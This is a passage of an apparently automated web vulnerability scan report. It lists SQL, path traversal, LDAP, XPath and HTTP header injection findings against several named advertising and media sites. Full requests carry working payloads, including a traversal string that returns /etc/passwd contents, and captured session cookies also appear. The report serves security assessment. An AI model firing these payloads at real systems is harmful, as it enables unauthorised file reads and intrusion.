User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_last_activity=1304375581; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=440469-12fb26a1110-5868adc8-2; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.2.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.2.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:42:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376125; expires=Tue, 01-May-2012 15:42:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Set-Cookie: PHPSESSID=lbchnsd618s1qle9mcv7v84hq4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

2. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=0&adSize=970x66 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmb=234602824; __utmc=234602824

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Mon, 02 May 2011 13:05:45 GMT
Connection: close
Content-Length: 2009

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. LDAP injection
There are 2 instances of this issue:


3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9cedc10e48d229ef)(sn=* and 9cedc10e48d229ef)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=9cedc10e48d229ef)(sn=*&PRAd=253732016&AR_C=194941054 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=26&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 12:45:52 2011&prad=253735207&arc=207615337&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 14:58:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_9cedc10e48d229ef&#41;&#40;sn=exp=1&initExp=Mon May 2 14:58:49 2011&recExp=Mon May 2 14:58:49 2011&prad=253732016&arc=194941054&; expires=Sun 31-Jul-2011 14:58:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304348329; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=9cedc10e48d229ef)!(sn=*&PRAd=253732016&AR_C=194941054 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=26&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 12:45:52 2011&prad=253735207&arc=207615337&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 14:58:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_9cedc10e48d229ef&#41;!&#40;sn=exp=1&initExp=Mon May 2 14:58:49 2011&recExp=Mon May 2 14:58:49 2011&prad=253732016&arc=194941054&; expires=Sun 31-Jul-2011 14:58:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304348329; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3.2. http://data.cmcore.com/imp [ci parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8c2b229d97e563c0)(sn=* and 8c2b229d97e563c0)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=8c2b229d97e563c0)(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-turn-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38488051&cm_mmca4=podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca5=728x90&cm_mmca6=ad_ntwk&cm_mmca7=turn_remark_podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=dpcm&cm_mmca12=dr&cm_mmca13=1&rand=37658442370594&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:52:13 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 8c2b229d97e563c0)(sn=*_login=130434073301510620268c2b229d97e563c0)(sn=*; path=/
Set-Cookie: 8c2b229d97e563c0)(sn=*_reset=1304340733;path=/
Expires: Sun, 01 May 2011 18:52:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=8c2b229d97e563c0)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-turn-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38488051&cm_mmca4=podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca5=728x90&cm_mmca6=ad_ntwk&cm_mmca7=turn_remark_podr_flip_banner_blue_newlogo_728x90_f8_tag_1clicktag&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=dpcm&cm_mmca12=dr&cm_mmca13=1&rand=37658442370594&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22;sz=728x90;ord=2458982814544528242?;click=http://r.turn.com/r/formclick/id/coO3cdcPICJnAwwAAgIBAA/url/;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 12:52:13 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 8c2b229d97e563c0)!(sn=*_login=130434073301175075948c2b229d97e563c0)!(sn=*; path=/
Set-Cookie: 8c2b229d97e563c0)!(sn=*_reset=1304340733;path=/
Expires: Sun, 01 May 2011 18:52:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

4. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.patlive.com
Path:   /appointment-scheduling/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /appointment-scheduling'/ HTTP/1.1
Host: www.patlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 02 May 2011 15:05:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8950

<html>
<head>
<title>Expression must evaluate to a node-set.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p
...[SNIP]...
</b>System.Xml.XPath.XPathException: Expression must evaluate to a node-set.<br>
...[SNIP]...
<pre>

[XPathException: Expression must evaluate to a node-set.]
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeType) +3961158
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +77
MS.Internal.Xml.XPath.XPathParse
...[SNIP]...

5. HTTP header injection
There are 10 instances of this issue:


5.1. http://ad.doubleclick.net/crossdomain.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82519%0d%0a8220753ce5b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /crossdomain.xml82519%0d%0a8220753ce5b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2462067/PID_1583174_inpage.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/crossdomain.xml82519
8220753ce5b
:
Date: Mon, 02 May 2011 13:00:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

5.2. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/18/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 46093%0d%0aba45031a507 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/18/725047/adscout.php?ord=4dbeaba3daa70 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://designers.glam.com/2011/04/29/royal-wedding-style-what-the-guests-wore/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1; ES=46093%0d%0aba45031a507

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 13:13:21 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 02-May-2010 13:13:20 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1; expires=Fri, 22-Jun-2012 05:13:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=46093
ba45031a507
_724925-*=''M-0; expires=Fri, 22-Jun-2012 05:13:21 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

5.3. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/9/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload fd770%0d%0a517a9219aec was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/9/725047/adscout.php?ord=4dbeac7db2be2 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/topic/?hideEditorial=1&searchTerm=Westminster+Abbey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1; ES=fd770%0d%0a517a9219aec

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 13:51:18 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Sun, 02-May-2010 13:51:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-4_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-1_725047-9-1; expires=Fri, 22-Jun-2012 05:51:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=fd770
517a9219aec
_724925-|D('M-0; expires=Fri, 22-Jun-2012 05:51:18 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

5.4. http://bidder.mathtag.com/iframe/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload d49c0%0d%0a33877e5090a was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=d49c0%0d%0a33877e5090a&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTc1OTM3MjIxNzMyMzAxNDkvMTE1MDAzLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVG1CakFyMmVCVkhqT1lVd29YYV9SNTAv/bkSgJJWtYyLr6MfnqzzkMJWgIEo&price=Tb7HRQABokUK7FpOI0VITLWGsnTlT7R7SBUAfg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBazKnRce-TcXEBs60sQfMkJWaAtzvj_EB5PW9vBHImoSTEgAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi04MTU3MDAxNDA3NDE3Mjk4oAHg6pnsA7IBEXd3dy5vcmJpdGNhc3QuY29tugEJNzI4eDkwX2FzyAEJ2gEmaHR0cDovL3d3dy5vcmJpdGNhc3QuY29tL2FyY2hpdmVzLmh0bWyYAtAPwAIEyALWwYwOqAMB6APXAegDTvUDBAAAxIAGqcqGqrbH1Jtb%26num%3D1%26sig%3DAGiWqtyta5N-nE1sh-4x-VE0N704RIsesQ%26client%3Dca-pub-8157001407417298%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304340485; mt_mop=4:1304340485

Response

HTTP/1.1 404 Not found
Date: Mon, 02 May 2011 15:01:52 GMT
Server: MMBD/3.5.3
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - d49c0
33877e5090a

x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

5.5. http://clickserve.cc-dt.com/link/tplimage [lid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clickserve.cc-dt.com
Path:   /link/tplimage

Issue detail

The value of the lid request parameter is copied into the Location response header. The payload 9cbce%0d%0a676b5b556a6 was submitted in the lid parameter. This caused a response containing an injected HTTP header.

Request

GET /link/tplimage?lid=9cbce%0d%0a676b5b556a6&pubid=21000000000176230 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 13:29:00 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_impression?lid=9cbce
676b5b556a6
&pubid=21000000000176230
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 02 May 2011 13:29:00 GMT
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=9cbc
...[SNIP]...

5.6. http://clickserve.cc-dt.com/link/tplimage [pubid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clickserve.cc-dt.com
Path:   /link/tplimage

Issue detail

The value of the pubid request parameter is copied into the Location response header. The payload 391ec%0d%0a7c35b386e75 was submitted in the pubid parameter. This caused a response containing an injected HTTP header.

Request

GET /link/tplimage?lid=41000000027557560&pubid=391ec%0d%0a7c35b386e75 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;